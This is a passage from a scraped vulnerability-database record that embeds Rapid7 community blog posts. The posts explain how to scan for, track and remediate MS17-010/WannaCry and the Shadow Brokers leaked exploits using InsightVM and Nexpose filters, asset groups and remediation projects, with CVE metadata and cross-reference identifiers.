asset.vulnerability.title CONTAINS \"ms14-068\" OR asset.vulnerability.title CONTAINS \"ms09-050\" OR asset.vulnerability.title CONTAINS \"ms08-067\" OR asset.vulnerability.title CONTAINS \"ms17-010\"</span></p></blockquote><p>It&#8217;ll look something like this:</p><p><span style=\"font-size: 11pt; font-family: Calibri; color: #212121;\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\"><img class=\"jive-image\" height=\"132\" src=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\" style=\"border-style: none;\" width=\"624\"/></a></span> </span></p><p>I&#8217;ve saved this filter so I can use it across any number of cards I wish. Since I&#8217;ve done the work of creating the filter once, it is straightforward to add cards, apply the filter, and then save the Cards to my dashboard. I&#8217;ve built a tailored view, showing the impact of the Shadow Brokers leaked exploits on my organization.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\"><img class=\"jive-image\" height=\"379\" src=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>If you&#8217;re feeling comfortable with this approach, take a step futher! Try out an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7838\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/04/24/actionable-remediation-projects\">Actionable Remediation Project</a> from here and get started taking down these risks on your turf.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Not a customer of ours? <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">Try a free 30-day trial of InsightVM here</a>.</p><h4></h4></div><!-- [DocumentBodyEnd:f67c4b5d-4e9f-4a32-a187-cc604c412a04] -->", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits", "modified": "2017-05-24T23:14:26", "lastseen": "2017-05-25T17:57:11", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-05-15T18:25:42", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2017-05-15T18:48:41", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-05-15T18:48:41", "rev": 2}}, "id": "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "objectVersion": "1.5", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 190, "reporter": "Nathan Palanov", "references": [], "enchantments_done": [], "type": "rapid7community", "_object_type": "robots.models.rss.RssBulletin", "history": [{"lastseen": "2017-05-15T17:48:40", "bulletin": {"published": "2017-05-15T17:30:34", "enchantments": {}, "id": "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 8, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:425e125a-783e-4160-8d35-eab296a1b1bb] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with over 190 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"vulnerability title\" filter to search for MS17-010 and click \"Create Asset Group\":</span></p><p dir=\"ltr\"><span style=\"color: #000000; text-decoration: underline; font-size: 18pt; font-family: Arial;\"><strong><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66964/pastedImage_35.png\"><img class=\"jive-image image-14\" height=\"183\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66964/758-183/pastedImage_35.png\" style=\" width:758px;\" width=\"758\"/></a></strong></span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in &ldquo;vulnerability.vulnKey = &ldquo;MS17-010&#8221;:</span></p><p><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66962/pastedImage_29.png\"><img class=\"image-12 jive-image\" height=\"539\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66962/758-539/pastedImage_29.png\" style=\" width: 833.213px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p></div><!-- [DocumentBodyEnd:425e125a-783e-4160-8d35-eab296a1b1bb] -->", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/15/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-15T17:30:34", "lastseen": "2017-05-15T17:48:40"}, "differentElements": ["description", "published", "modified"], "edition": 1}], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:2ca40ae4-bf1e-4d07-bca8-48bcdefcec45] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p 